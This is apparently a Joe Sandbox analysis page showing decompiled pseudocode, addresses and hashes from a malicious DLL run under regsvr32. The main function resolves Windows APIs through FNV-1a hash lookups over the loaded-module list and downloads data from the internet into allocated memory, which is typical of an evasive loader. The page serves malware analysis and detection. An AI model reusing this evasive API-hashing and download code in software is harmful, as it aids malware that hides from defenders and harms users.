																		_v536 = _v160 +  *((intOrPtr*)(_v156 + 0x24));
																		_v544 = _v160 +  *((intOrPtr*)(_v540 + ( *(_v536 + _v56 * 2) & 0x0000ffff) * 4));
																		_v220 = _v544;
																		L52:
																		_v560 =  &_v556;
																		_v596 =  *_v560;
																		_v568 =  &_v564;
																		_v600 =  *_v568;
																		_v576 =  &_v572;
																		_v604 =  *_v576;
																		_v584 =  &_v580;
																		_v608 =  *_v584;
																		_v588 =  &_a4;
																		_v612 =  *_v588;
																		_v592 =  &_v80;
																		_v616 =  *_v592;
																		_v112 = _v220(_v616, _v612, _v608, _v604, _v600, _v596);
																		if(_v112 != 0) {
																			do {
																				_v724 =  &_v76;
																				_v732 = 0xc00;
																				_v740 =  &_v4084;
																				_v252 = _v984;
																				_v676 =  *[fs:0x30];
																				_v680 =  *((intOrPtr*)(_v676 + 0xc));
																				_v684 =  *((intOrPtr*)(_v680 + 0xc));
																				_v248 = _v684;
																				do {
																					_v100 =  *((intOrPtr*)(_v248 + 0x18));
																					_v184 = _v100;
																					_v688 = _v100 +  *((intOrPtr*)(_v100 + 0x3c));
																					_t1175 = _v688;
																					_v932 =  *((intOrPtr*)(_t1175 + 0x78));
																					_v928 =  *((intOrPtr*)(_t1175 + 0x7c));
																					_v180 = _v100 + _v932;
																					_v176 = _v928;
																					if(_v180 == _v184) {
																						_v336 = 0;
																					} else {
																						_v336 = 1;
																					}
																					_v25 = _v336;
																					if((_v25 & 0x000000ff) == 0) {
																						goto L84;
																					}
																					_v64 =  *((intOrPtr*)(_v180 + 0x18));
																					while(1) {
																						_v692 = _v64;
																						_v64 = _v64 - 1;
																						if(_v692 == 0) {
																							goto L84;
																						}
																						_v696 = _v184 +  *((intOrPtr*)(_v184 +  *((intOrPtr*)(_v180 + 0x20)) + _v64 * 4));
																						_v240 = _v696;
																						_v244 = 0x811c9dc5;
																						while(1) {
																							_v26 =  *_v240;
																							_v240 = _v240 + 1;
																							_v9 = _v26;
																							if(_v9 == 0) {
																								break;
																							}
																							_v244 = (_v9 ^ _v244) * 0x1000193;
																						}
																						_v700 = _v244;
																						if(_v700 != 0x960cb4c6) {
																							continue;
																						}
																						_v708 = _v184 +  *((intOrPtr*)(_v180 + 0x1c));
																						_v704 = _v184 +  *((intOrPtr*)(_v180 + 0x24));
																						_v712 = _v184 +  *((intOrPtr*)(_v708 + ( *(_v704 + _v64 * 2) & 0x0000ffff) * 4));
																						_v252 = _v712;
																						L86:
																						_v728 =  &_v724;
																						_v752 =  *_v728;
																						_v736 =  &_v732;
																						_v756 =  *_v736;
																						_v744 =  &_v740;
																						_v760 =  *_v744;
																						_v748 =  &_v112;
																						_v764 =  *_v748;
																						_v252(_v764, _v760, _v756, _v752);
																						_t651 = _v76 + 1; // 0x1
																						_v816 = _v44 + _t651;
																						_v824 = 0x40;
																						_v264 = _v988;
																						_v768 =  *[fs:0x30];
																						_v772 =  *((intOrPtr*)(_v768 + 0xc));
																						_v776 =  *((intOrPtr*)(_v772 + 0xc));
																						_v260 = _v776;
																						do {
																							_v104 =  *((intOrPtr*)(_v260 + 0x18));
																							_v196 = _v104;
																							_v780 = _v104 +  *((intOrPtr*)(_v104 + 0x3c));
																							_t1370 = _v780;
																							_v940 =  *((intOrPtr*)(_t1370 + 0x78));
																							_v936 =  *((intOrPtr*)(_t1370 + 0x7c));
																							_v192 = _v104 + _v940;
																							_v188 = _v936;
																							if(_v192 == _v196) {
																								_v340 = 0;
																							} else {
																								_v340 = 1;
																							}
																							_v28 = _v340;
																							if((_v28 & 0x000000ff) == 0) {
																								goto L100;
																							}
																							_v68 =  *((intOrPtr*)(_v192 + 0x18));
																							while(1) {
																								_v784 = _v68;
																								_v68 = _v68 - 1;
																								if(_v784 == 0) {
																									goto L100;
																								}
																								_v788 = _v196 +  *((intOrPtr*)(_v196 +  *((intOrPtr*)(_v192 + 0x20)) + _v68 * 4));
																								_v256 = _v788;
																								_v288 = 0x811c9dc5;
																								while(1) {
																									_v29 =  *_v256;
																									_v256 = _v256 + 1;
																									_v10 = _v29;
																									if(_v10 == 0) {
																										break;
																									}
																									_v288 = (_v10 ^ _v288) * 0x1000193;
																								}
																								_v792 = _v288;
																								if(_v792 != 0xc2c33c3d) {
																									continue;
																								}
																								_v800 = _v196 +  *((intOrPtr*)(_v192 + 0x1c));
																								_v796 = _v196 +  *((intOrPtr*)(_v192 + 0x24));
																								_v804 = _v196 +  *((intOrPtr*)(_v800 + ( *(_v796 + _v68 * 2) & 0x0000ffff) * 4));
																								_v264 = _v804;
																								L102:
																								_v820 =  &_v816;
																								_v832 =  *_v820;
																								_v828 =  &_v824;
																								_v836 =  *_v828;
																								_v284 = _v264(_v836, _v832);
																								if(_v40 != 0) {
																									E6E41AA10(_v284, _v40, _v44);
																								}
																								E6E41AA10(_v284 + _v44,  &_v4084, _v76);
																								if(_v40 == 0) {
																									goto L122;
																								}
																								_v280 = _v992;
																								_v840 =  *[fs:0x30];
																								_v844 =  *((intOrPtr*)(_v840 + 0xc));
																								_v848 =  *((intOrPtr*)(_v844 + 0xc));
																								_v276 = _v848;
																								do {
																									_v108 =  *((intOrPtr*)(_v276 + 0x18));
																									_v124 = _v108;
																									_v852 = _v108 +  *((intOrPtr*)(_v108 + 0x3c));
																									_t995 = _v852;
																									_v948 =  *((intOrPtr*)(_t995 + 0x78));
																									_v944 =  *((intOrPtr*)(_t995 + 0x7c));
																									_v120 = _v108 + _v948;
																									_v116 = _v944;
																									if(_v120 == _v124) {
																										_v316 = 0;
																									} else {
																										_v316 = 1;
																									}
																									_v31 = _v316;
																									if((_v31 & 0x000000ff) == 0) {
																										goto L119;
																									}
																									_v72 =  *((intOrPtr*)(_v120 + 0x18));
																									while(1) {
																										_v856 = _v72;
																										_v72 = _v72 - 1;
																										if(_v856 == 0) {
																											goto L119;
																										}
																										_v860 = _v124 +  *((intOrPtr*)(_v124 +  *((intOrPtr*)(_v120 + 0x20)) + _v72 * 4));
																										_v268 = _v860;
																										_v272 = 0x811c9dc5;
																										while(1) {
																											_v32 =  *_v268;
																											_v268 = _v268 + 1;
																											_v11 = _v32;
																											if(_v11 == 0) {
																												break;
																											}
																											_v272 = (_v11 ^ _v272) * 0x1000193;
																										}
																										_v864 = _v272;
																										if(_v864 != 0xbf0306f6) {
																											continue;
																										}
																										_v872 = _v124 +  *((intOrPtr*)(_v120 + 0x1c));
																										_v868 = _v124 +  *((intOrPtr*)(_v120 + 0x24));
																										_v876 = _v124 +  *((intOrPtr*)(_v872 + ( *(_v868 + _v72 * 2) & 0x0000ffff) * 4));
																										_v280 = _v876;
																										L121:
																										_v888 =  &_v40;
																										_v892 =  *_v888;
																										_v280(_v892);
																										goto L122;
																									}
																									L119:
																									_v880 = _v276;
																									_v884 =  *_v880;
																									_v276 = _v884;
																									_v33 = 1;
																								} while ((_v33 & 0x000000ff) != 0);
																								_v280 = 0;
																								goto L121;
																							}
																							L100:
																							_v808 = _v260;
																							_v812 =  *_v808;
																							_v260 = _v812;
																							_v30 = 1;
																						} while ((_v30 & 0x000000ff) != 0);
																						_v264 = 0;
																						goto L102;
																					}
																					L84:
																					_v716 = _v248;
																					_v720 =  *_v716;
																					_v248 = _v720;
																					_v27 = 1;
																				} while ((_v27 & 0x000000ff) != 0);
																				_v252 = 0;
																				goto L86;
																				L122:
																				_v40 = _v284;
																				_v44 = _v44 + _v76;
																			} while (_v76 != 0);
																			 *((char*)(_v40 + _v44)) = 0;
																			InternetCloseHandle(_v112);
																			InternetCloseHandle(_v80);
																			return _v40;
																		}
																		_v236 = _v980;
																		_v620 =  *[fs:0x30];
																		_v624 =  *((intOrPtr*)(_v620 + 0xc));
																		_v628 =  *((intOrPtr*)(_v624 + 0xc));
																		_v232 = _v628;
																		do {
																			_v96 =  *((intOrPtr*)(_v232 + 0x18));
																			_v172 = _v96;
																			_v632 = _v96 +  *((intOrPtr*)(_v96 + 0x3c));
																			_t1250 = _v632;
																			_v924 =  *((intOrPtr*)(_t1250 + 0x78));
																			_v920 =  *((intOrPtr*)(_t1250 + 0x7c));
																			_v168 = _v96 + _v924;
																			_v164 = _v920;
																			if(_v168 == _v172) {
																				_v324 = 0;
																			} else {
																				_v324 = 1;
																			}
																			_v22 = _v324;
																			if((_v22 & 0x000000ff) != 0) {
																				_v60 =  *((intOrPtr*)(_v168 + 0x18));
																				while(1) {
																					_v636 = _v60;
																					_v60 = _v60 - 1;
																					if(_v636 == 0) {
																						goto L67;
																					}
																					_v640 = _v172 +  *((intOrPtr*)(_v172 +  *((intOrPtr*)(_v168 + 0x20)) + _v60 * 4));
																					_v224 = _v640;
																					_v228 = 0x811c9dc5;
																					while(1) {
																						_v23 =  *_v224;
																						_v224 = _v224 + 1;
																						_v8 = _v23;
																						if(_v8 == 0) {
																							break;
																						}
																						L63:
																						_v228 = (_v8 ^ _v228) * 0x1000193;
																					}
																					_v644 = _v228;
																					if(_v644 != 0x4ddde966) {
																						continue;
																					} else {
																						_v652 = _v172 +  *((intOrPtr*)(_v168 + 0x1c));
																						_v648 = _v172 +  *((intOrPtr*)(_v168 + 0x24));
																						_v656 = _v172 +  *((intOrPtr*)(_v652 + ( *(_v648 + _v60 * 2) & 0x0000ffff) * 4));
																						_v236 = _v656;
																						L69:
																						_v668 =  &_v80;
																						_v672 =  *_v668;
																						_v236(_v672);
																						return 0;
																					}
																					goto L63;
																				}
																			}
																			L67:
																			_v660 = _v232;
																			_v664 =  *_v660;
																			_v232 = _v664;
																			_v24 = 1;
																		} while ((_v24 & 0x000000ff) != 0);
																		_v236 = 0;
																		goto L69;
																	}
																	goto L46;
																}
															}
															L50:
															_v548 = _v216;
															_v552 =  *_v548;
															_v216 = _v552;
															_v21 = 1;
														} while ((_v21 & 0x000000ff) != 0);
														_v220 = 0;
														goto L52;
													}
													return 0;
												}
												goto L28;
											}
										}
										L32:
										_v444 = _v200;
										_v448 =  *_v444;
										_v200 = _v448;
										_v18 = 1;
									} while ((_v18 & 0x000000ff) != 0);
									_v204 = 0;
									goto L34;
								}
								return 0;
							}
							goto L10;
						}
					}
					L14:
					_v360 = _v300;
					_v364 =  *_v360;
					_v300 = _v364;
					_v14 = 1;
				} while ((_v14 & 0x000000ff) != 0);
				_v304 = 0;
				goto L16;
			}

0x6e418309
0x6e418310
0x6e418317
0x6e418321
0x6e418328
0x6e41832f
0x6e418336
0x6e418340
0x6e41834a
0x6e41835a
0x6e418367
0x6e418376
0x6e418385
0x6e418391
0x6e418397
0x6e4183a0
0x6e4183a6
0x6e4183b5
0x6e4183c3
0x6e4183d1
0x6e4183d7
0x6e4183e6
0x6e4183f2
0x6e418404
0x6e418412
0x6e418406
0x6e418406
0x6e418406
0x6e418422
0x6e41842b
0x6e41843a
0x6e41843d
0x6e418440
0x6e41844c
0x6e418456
0x00000000
0x00000000
0x6e418477
0x6e418483
0x6e418489
0x6e418493
0x6e41849b
0x6e4184a7
0x6e4184b0
0x6e4184b9
0x00000000
0x00000000
0x6e4184c9
0x6e4184da
0x6e4184da
0x6e4184c1
0x6e4184ec
0x00000000
0x6e4184ee
0x6e4184fd
0x6e418512
0x6e418534
0x6e418540
0x6e41858d
0x6e418593
0x6e4185a1
0x6e4185ad
0x6e4185bb
0x6e4185c4
0x6e4185d2
0x6e4185f3
0x6e418600
0x6e418609
0x6e418615
0x6e418618
0x6e418622
0x6e41862c
0x6e41863e
0x6e41864a
0x6e418657
0x6e418666
0x6e418675
0x6e418681
0x6e418687
0x6e418690
0x6e418696
0x6e4186a5
0x6e4186b3
0x6e4186c1
0x6e4186c7
0x6e4186d6
0x6e4186df
0x6e4186eb
0x6e4186f9
0x6e4186ed
0x6e4186ed
0x6e4186ed
0x6e418709
0x6e418712
0x6e41871e
0x6e418721
0x6e418724
0x6e418730
0x6e41873a
0x00000000
0x00000000
0x6e418758
0x6e418764
0x6e41876a
0x6e418774
0x6e41877c
0x6e418788
0x6e418791
0x6e41879a
0x00000000
0x00000000
0x6e4187aa
0x6e4187bb
0x6e4187bb
0x6e4187a2
0x6e4187cd
0x00000000
0x6e4187cf
0x6e4187db
0x6e4187ed
0x6e41880f
0x6e41881b
0x6e418868
0x6e41886e
0x6e41887c
0x6e418888
0x6e418896
0x6e4188a2
0x6e4188b0
0x6e4188bc
0x6e4188ca
0x6e4188d6
0x6e4188e2
0x6e4188ed
0x6e41891c
0x6e418923
0x6e41892c
0x6e418936
0x6e418940
0x6e41894a
0x6e41895a
0x6e418967
0x6e418976
0x6e418985
0x6e418991
0x6e418997
0x6e4189a0
0x6e4189a6
0x6e4189b5
0x6e4189c3
0x6e4189d1
0x6e4189d7
0x6e4189e6
0x6e4189f2
0x6e418a04
0x6e418a12
0x6e418a06
0x6e418a06
0x6e418a06
0x6e418a22
0x6e418a2b
0x6e418a3a
0x6e418a3d
0x6e418a40
0x6e418a4c
0x6e418a56
0x00000000
0x00000000
0x6e418a77
0x6e418a83
0x6e418a89
0x6e418a93
0x6e418a9b
0x6e418aa7
0x6e418ab0
0x6e418ab9
0x00000000
0x00000000
0x6e418ac9
0x6e418ada
0x6e418ada
0x6e418ac1
0x6e418aec
0x00000000
0x6e418aee
0x6e418afd
0x6e418b12
0x6e418b34
0x6e418b40
0x6e418b8d
0x6e418b93
0x6e418ba1
0x6e418bad
0x6e418bbb
0x6e418bc7
0x6e418bd5
0x6e418be1
0x6e418bef
0x6e418bf8
0x6e418c06
0x6e418c0f
0x6e418c1d
0x6e418c53
0x6e418c5a
0x6e418ec3
0x6e418ec6
0x6e418ecc
0x6e418edc
0x6e418ee8
0x6e418ef4
0x6e418f03
0x6e418f12
0x6e418f1e
0x6e418f24
0x6e418f2d
0x6e418f33
0x6e418f42
0x6e418f50
0x6e418f5e
0x6e418f64
0x6e418f73
0x6e418f7f
0x6e418f91
0x6e418f9f
0x6e418f93
0x6e418f93
0x6e418f93
0x6e418faf
0x6e418fb8
0x00000000
0x00000000
0x6e418fc7
0x6e418fca
0x6e418fcd
0x6e418fd9
0x6e418fe3
0x00000000
0x00000000
0x6e419004
0x6e419010
0x6e419016
0x6e419020
0x6e419028
0x6e419034
0x6e41903d
0x6e419046
0x00000000
0x00000000
0x6e419067
0x6e419067
0x6e41904e
0x6e419079
0x00000000
0x6e4190d5
0x6e41908a
0x6e41909f
0x6e4190c1
0x6e4190cd
0x6e41911a
0x6e419120
0x6e41912e
0x6e41913a
0x6e419148
0x6e419154
0x6e419162
0x6e41916b
0x6e419179
0x6e41919b
0x6e4191a7
0x6e4191ab
0x6e4191b1
0x6e4191c1
0x6e4191ce
0x6e4191dd
0x6e4191ec
0x6e4191f8
0x6e4191fe
0x6e419207
0x6e41920d
0x6e41921c
0x6e41922a
0x6e419238
0x6e41923e
0x6e41924d
0x6e419259
0x6e41926b
0x6e419279
0x6e41926d
0x6e41926d
0x6e41926d
0x6e419289
0x6e419292
0x00000000
0x00000000
0x6e4192a1
0x6e4192a4
0x6e4192a7
0x6e4192b3
0x6e4192bd
0x00000000
0x00000000
0x6e4192de
0x6e4192ea
0x6e4192f0
0x6e4192fa
0x6e419302
0x6e41930e
0x6e419317
0x6e419320
0x00000000
0x00000000
0x6e419341
0x6e419341
0x6e419328
0x6e419353
0x00000000
0x6e4193af
0x6e419364
0x6e419379
0x6e41939b
0x6e4193a7
0x6e4193f4
0x6e4193fa
0x6e419408
0x6e419414
0x6e419422
0x6e41943c
0x6e419446
0x6e419457
0x6e419457
0x6e419471
0x6e41947a
0x00000000
0x00000000
0x6e419486
0x6e419493
0x6e4194a2
0x6e4194b1
0x6e4194bd
0x6e4194c3
0x6e4194cc
0x6e4194d2
0x6e4194de
0x6e4194ec
0x6e4194fa
0x6e419500
0x6e41950f
0x6e419518
0x6e419521
0x6e41952f
0x6e419523
0x6e419523
0x6e419523
0x6e41953f
0x6e419548
0x00000000
0x00000000
0x6e419554
0x6e419557
0x6e41955a
0x6e419566
0x6e419570
0x00000000
0x00000000
0x6e419588
0x6e419594
0x6e41959a
0x6e4195a4
0x6e4195ac
0x6e4195b8
0x6e4195c1
0x6e4195ca
0x00000000
0x00000000
0x6e4195eb
0x6e4195eb
0x6e4195d2
0x6e4195fd
0x00000000
0x6e41964a
0x6e419608
0x6e419617
0x6e419636
0x6e419642
0x6e41968f
0x6e419692
0x6e4196a0
0x6e4196ad
0x00000000
0x6e4196ad
0x6e41964f
0x6e419655
0x6e419663
0x6e41966f
0x6e419675
0x6e41967d
0x6e419685
0x00000000
0x6e419685
0x6e4193b4
0x6e4193ba
0x6e4193c8
0x6e4193d4
0x6e4193da
0x6e4193e2
0x6e4193ea
0x00000000
0x6e4193ea
0x6e4190da
0x6e4190e0
0x6e4190ee
0x6e4190fa
0x6e419100
0x6e419108
0x6e419110
0x00000000
0x6e4196b3
0x6e4196b9
0x6e4196c2
0x6e4196c5
0x6e4196d5
0x6e4196dc
0x6e4196e6
0x00000000
0x6e4196ec
0x6e418c66
0x6e418c72
0x6e418c81
0x6e418c90
0x6e418c9c
0x6e418ca2
0x6e418cab
0x6e418cb1
0x6e418cc0
0x6e418cce
0x6e418cdc
0x6e418ce2
0x6e418cf1
0x6e418cfd
0x6e418d0f
0x6e418d1d
0x6e418d11
0x6e418d11
0x6e418d11
0x6e418d2d
0x6e418d36
0x6e418d45
0x6e418d48
0x6e418d4b
0x6e418d57
0x6e418d61
0x00000000
0x00000000
0x6e418d82
0x6e418d8e
0x6e418d94
0x6e418d9e
0x6e418da6
0x6e418db2
0x6e418dbb
0x6e418dc4
0x00000000
0x00000000
0x6e418dd4
0x6e418de5
0x6e418de5
0x6e418dcc
0x6e418df7
0x00000000
0x6e418df9
0x6e418e08
0x6e418e1d
0x6e418e3f
0x6e418e4b
0x6e418e98
0x6e418e9b
0x6e418ea9
0x6e418eb6
0x00000000
0x6e418ebc
0x00000000
0x6e418df7
0x6e418d48
0x6e418e58
0x6e418e5e
0x6e418e6c
0x6e418e78
0x6e418e7e
0x6e418e86
0x6e418e8e
0x00000000
0x6e418e8e
0x00000000
0x6e418aec
0x6e418a3d
0x6e418b4d
0x6e418b53
0x6e418b61
0x6e418b6d
0x6e418b73
0x6e418b7b
0x6e418b83
0x00000000
0x6e418b83
0x00000000
0x6e418925
0x00000000
0x6e4187cd
0x6e418721
0x6e418828
0x6e41882e
0x6e41883c
0x6e418848
0x6e41884e
0x6e418856
0x6e41885e
0x00000000
0x6e41885e
0x00000000
0x6e418602
0x00000000
0x6e4184ec
0x6e41843d
0x6e41854d
0x6e418553
0x6e418561
0x6e41856d
0x6e418573
0x6e41857b
0x6e418583
0x00000000

Strings

@, xrefs: 6E4191B1

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9377d764f1b8c754432ca8a8efd3be42d8722f457792608313da8fe61a20edf9
Instruction ID: 47338831d8938bb15c43a09f9f050dee73fdcb2c342f0bb5c9f08d23f9405d0a
Opcode Fuzzy Hash: 9377d764f1b8c754432ca8a8efd3be42d8722f457792608313da8fe61a20edf9
Instruction Fuzzy Hash: 26D28B74E052698FCB69CF69C894BEDBBB1BF89304F1081DAD849A7355D730AA81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E45ACAD Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6E45ACAD(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6E45ADC8(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6E45B880(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6E45B880(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6E45ADC8(_t49);
				}
				return _t49;
			}

0x6e45acad
0x6e45acad
0x6e45acad
0x6e45acc1
0x6e45acc3
0x6e45acc6
0x6e45acc6
0x6e45acca
0x6e45accf
0x6e45ace7
0x6e45aced
0x6e45acf3
0x6e45acf9
0x6e45acff
0x6e45ad05
0x6e45ad0b
0x6e45ad12
0x6e45ad19
0x6e45ad20
0x6e45ad27
0x6e45ad2e
0x6e45ad35
0x6e45ad36
0x6e45ad3f
0x6e45ad45
0x6e45ad48
0x6e45ad4e
0x6e45ad5d
0x6e45ad69
0x6e45ad74
0x6e45ad7b
0x6e45ad82
0x6e45ad8d
0x6e45ad95
0x6e45ad9e
0x6e45ada0
0x6e45ada3
0x6e45ada5
0x6e45adaf
0x6e45adb7
0x6e45adbd
0x00000000
0x6e45adc4
0x6e45adc7

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E45ACB9
IsDebuggerPresent.KERNEL32 ref: 6E45AD85
SetUnhandledExceptionFilter.KERNEL32 ref: 6E45ADA5
UnhandledExceptionFilter.KERNEL32(?), ref: 6E45ADAF

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 2f1495f541e9f2cb45c970b9cf84bf3cf8e4cc7731981f2c0573806f419df19a
Instruction ID: e0b52e522c6756697ebe5d32f5f57f10379abad41e3a4ca7ca774968b01cffb9
Opcode Fuzzy Hash: 2f1495f541e9f2cb45c970b9cf84bf3cf8e4cc7731981f2c0573806f419df19a
Instruction Fuzzy Hash: 6E313675D4521C9BDF50EFB4D989BCDBBB8BF09304F1041AAE40CAB240EB709A888F54

Uniqueness

Uniqueness Score: -1.00%

Function 6E45D490 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E6E45D490(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x6e474024; // 0xb68207cc
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6E45ADC8(_t41);
					_pop(_t61);
				}
				E6E45B880(_t66,  &_v804, 0, 0x50);
				E6E45B880(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0x570f08ec
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x6e46b4b4
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0x83ec8b55
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x12ebf845
				_v804 =  *_t30;
				_t32 =  &_a12; // 0x83f8458b
				_v800 =  *_t32;
				_t34 =  &_v0; // 0x570f08ec
				_v792 =  *_t34;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x6e46b188
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0x130f66c0
					_push( *_t38);
					_t57 = E6E45ADC8(_t57);
				}
				_t39 =  &_v8; // 0xccccc35d
				return E6E45AF4F(_t57, _t60,  *_t39 ^ _t69, _t65, _t67, _t68);
			}

0x6e45d490
0x6e45d490
0x6e45d490
0x6e45d49b
0x6e45d4a0
0x6e45d4a2
0x6e45d4aa
0x6e45d4ac
0x6e45d4af
0x6e45d4b4
0x6e45d4b4
0x6e45d4c0
0x6e45d4d3
0x6e45d4e1
0x6e45d4e7
0x6e45d4ed
0x6e45d4f3
0x6e45d4f9
0x6e45d4ff
0x6e45d505
0x6e45d50b
0x6e45d511
0x6e45d517
0x6e45d51e
0x6e45d525
0x6e45d52c
0x6e45d533
0x6e45d53a
0x6e45d541
0x6e45d542
0x6e45d548
0x6e45d54b
0x6e45d551
0x6e45d551
0x6e45d554
0x6e45d55a
0x6e45d564
0x6e45d567
0x6e45d56d
0x6e45d570
0x6e45d576
0x6e45d579
0x6e45d57f
0x6e45d582
0x6e45d590
0x6e45d592
0x6e45d598
0x6e45d5a7
0x6e45d5b3
0x6e45d5b3
0x6e45d5b6
0x6e45d5bb
0x6e45d5bc
0x6e45d5c8

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E45D588
SetUnhandledExceptionFilter.KERNEL32 ref: 6E45D592
UnhandledExceptionFilter.KERNEL32(6E46B188), ref: 6E45D59F

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5d55f406a03b3e81fdf426d17821147bb74eef8d5cd4b88303972414405b1839
Instruction ID: a750d88ce521146c954599b7a63476b6cd5da8f7cd1890b64978328380dd1c70
Opcode Fuzzy Hash: 5d55f406a03b3e81fdf426d17821147bb74eef8d5cd4b88303972414405b1839
Instruction Fuzzy Hash: C931D27490122CABCF61DF64D888BDDBBB8BF08314F5045EAE41CA7250E7709B958F54

Uniqueness

Uniqueness Score: -1.00%

Function 6E45EFD5 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E45EFD5(int _a4) {
				void* _t14;

				if(E6E462B7D(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6E45F05A(_t14, _a4);
